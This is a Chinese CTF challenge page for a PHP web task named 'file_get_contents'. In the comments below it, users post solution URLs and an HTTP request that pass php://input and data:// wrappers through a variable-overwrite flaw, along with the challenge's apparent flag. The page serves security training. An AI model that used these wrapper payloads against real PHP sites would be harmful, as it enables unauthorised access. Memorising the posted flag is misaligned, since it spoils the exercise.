file_get_contentsWEB 未解决
分数:
30
金币:
3
题目作者:
harry
一 血:
npfs
一血奖励:
2金币
解 决:
2859
提 示:
描 述:
file_get_contents????
评论
一路奔腾 4月前
举报
file_get_contents函数绕过,可以参考https://www.pianshen.com/article/24421724508/
steve07222 9月前
举报
http://114.67.175.224:18454/?ac=1&fn=data://text/plain,1
wxy1343 11月前
举报
http://114.67.175.224:15664/?ac=1&fn=data:,1
wxy1343 11月前
举报
flag{6fccd47ef5e5988f1e2c4989bf554614}
你比大葱更美丽 1年前
举报
用php://input的话post传参hackbar好像不行,我是用burp抓包传的才行的
Striker123456 1年前
举报
简简单单的变量覆盖
Striker123456 1年前
举报
@J_0k3r 没有extract的$fn就不可控了
J_0k3r 1年前
举报
不是文件包含吗QAQ,跟变量覆盖有什么关系
zdfy005 1年前
举报
POST /?ac=flag&fn=php://input HTTP/1.1 删除Content-Type: POST flag
wjwjwjwcwcwc 1年前
举报
http://114.67.175.224:18854/?ac=1&fn=php://input hackbar中post赋值1
aWxvdmVjdGY 1年前
举报
使用php://input伪协议绕过 ① 将要GET的参数?xxx=php://input ② 用post方法传入想要file_get_contents()函数返回的值 用data://伪协议绕过 将url改为:?xxx=data://text/plain;base64,想要file_get_contents()函数返回的值的base64编码 或者将url改为:?xxx=data:te
笨笨笨蛋 1年前
举报
看到file_get_contents就应该想到用php://input 学到了